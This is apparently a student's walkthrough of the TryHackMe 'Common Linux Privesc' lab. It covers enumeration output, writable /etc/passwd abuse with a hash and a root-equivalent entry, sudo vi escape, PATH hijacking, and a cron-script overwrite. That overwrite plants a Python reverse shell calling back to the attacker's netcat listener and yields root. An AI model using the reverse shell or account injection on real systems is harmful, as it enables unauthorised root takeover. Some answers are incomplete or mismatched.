TryHackMe(THM):Common Linux Privesc-Writeup

Enumeration

$/.LinEnum.sh > out_LinEnum.txt

# 2 What is the target’s hostname?

$ more out_LinEnum.txt
*snip*
[-] Hostname:
*snip*

#3 Look at the output of /etc/passwd how many “user[x]” are there on the system?

[-] Group memberships:
*snip*
uid=1000(user1) gid=1000(user1) groups=1000(user1)
uid=1001(user2) gid=1001(user2) groups=1001(user2)
uid=1002(user3) gid=1002(user3) groups=1002(user3)
uid=1003(user4) gid=1003(user4) groups=1003(user4),0(root)
uid=120(statd) gid=65534(nogroup) groups=65534(nogroup)
uid=1004(user5) gid=1004(user5) groups=1004(user5)
uid=1005(user6) gid=1005(user6) groups=1005(user6)
uid=121(mysql) gid=131(mysql) groups=131(mysql)
uid=1006(user7) gid=0(root) groups=0(root)
uid=1007(user8) gid=1007(user8) groups=1007(user8)
*snip*

#4 How many available shells are there on the system?

[-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash

#5 What is the name of the bash script that is set to run every 5 minutes by cron?

[-] Crontab contents:
*snip*
# m h dom mon dow user command
*/5 * * * * root /home/user4/Desktop/autoscript.sh
*snip*

#6 What critical file has had its permissions changed to allow some users to write to it?

[-] Can we read/write sensitive files:
-rw-rw-r-- 1 root root 2694 Mar 6 2020 /etc/passwd
-rw-r--r-- 1 root root 1087 Jun 5 2019 /etc/group
-rw-r--r-- 1 root root 581 Apr 22 2016 /etc/profile
-rw-r----- 1 root shadow 2359 Mar 6 2020 /etc/shadow

Abusing SUID/GUID Files

#1 What is the path of the file in user3’s directory that stands out to you?

stands out to you

Exploiting Writeable /etc/passwd

#2 Having read the information above, what direction privilege escalation is this attack?

Remember the tree

#3 Before we add our new user, we first need to create a compliant password hash to add! We do this by using the command: “openssl passwd -1 -salt [salt] [password]”
What is the hash created by using this command with the salt, “new” and the password “123”?

user@kali:~$ openssl passwd -1 -salt new 123

#4 Great! Now we need to take this value, and create a new root user account. What would the /etc/passwd entry look like for a root user with the username “new” and the password hash we created before?

test:x:0:0:root:/root:/bin/bash

Escaping Vi Editor

#2 Let’s use the “sudo -l” command, what does this user require (or not require) to run vi as root?

$ sudo -l
*snip*
User user8 may run the following commands on polobox:
(root) NOPASSWD: /usr/bin/vi

Exploiting Crontab

#3 What is the flag to specify a payload in msfvenom?

$ msfvenom -h
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe
*snip*
-p, --payload <payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
*snip*

#5 What directory is the “autoscript.sh” under?

grep -r "autoscript.sh" /*
*snip*
/etc/crontab:*/5 * * * * root /home/user4/Desktop/autoscript.sh
*snip*

#6~#8

printf “python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\”10.**.**.**\”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\”/bin/sh\”,\”-i\”]);’\n” > /home/user4/Desktop/autoscript.sh
user@kali:~$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.4.16.12] from (UNKNOWN) [10.10.112.25] 48904
/bin/sh: 0: can't access tty; job control turned off
# whoami
root

Exploiting PATH Variable

#2 Let’s go to user5’s home directory, and run the file “script”. What command do we think that it’s executing?

user5@polobox:~$ ./script
Desktop Documents Downloads Music Pictures Public script Templates Videos

#4 Now we’re inside tmp, let’s create an imitation executable. The format for what we want to do is:
echo “[whatever command we want to run]” > [name of the executable we’re imitating]
What would the command look like to open a bash shell, writing to a file with the name of the executable we’re imitating

echo "[whatever command we want to run]" > [name of the executable we're imitating]

#5 Great! Now we’ve made our imitation, we need to make it an executable. What command do we execute to do this?

I already learned in the "Learn Linux" room.
according to The syntax of this command is typically chmod <permissions> <file>.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
yu1ch1

yu1ch1

I’m a Japanese high school student.I’m interested in hacking. I will be a super hacker like “Spooky”, who I respect the most. I have to study hacking for that.